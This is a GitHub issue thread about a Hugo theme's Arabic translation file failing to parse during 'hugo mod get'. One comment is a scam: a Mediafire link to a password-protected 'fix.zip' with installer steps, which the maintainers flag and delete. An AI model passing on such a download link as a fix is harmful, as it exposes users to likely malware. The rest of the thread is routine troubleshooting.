### ISSUE TITLE
Error on laoding resources

### ISSUE THREAD

**Issue by linuxscout** [sahaba-ai/awesome-arabic-speakers#11]
:~/projects/awesome-arabic-speakers$ hugo mod get
Error: add site dependencies: load resources: loading translations: "/tmp/hugo_cache/modules/filecache/modules/pkg/mod/github.com/!cai!jimmy/hugo-theme-stack/v3@v3.26.0/i18n/ar.yaml:1:1": failed to load translations: unable to parse translation #0 because invalid plural category title
map[id:search translation:map[placeholder:map[other:اكتب...] resultTitle:map[other:#PAGES_COUNT نتيجة (#TIME_SECONDS ثواني)] title:map[other:بحث]]]

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by linuxscout** [comment]
Is this a scam?

**Comment by aabouzaid** [comment]
@linuxscout I've reported the scammer and deleted its comment.

Regarding the issue, could you please share the output of the following commands:
- `go version`
- `hugo version`

You need at least Go v1.17 and Hugo v0.129.0 [extended](https://gohugo.io/installation/linux/#editions).

**Comment by linuxscout** [comment]
ok, I work on installation issues
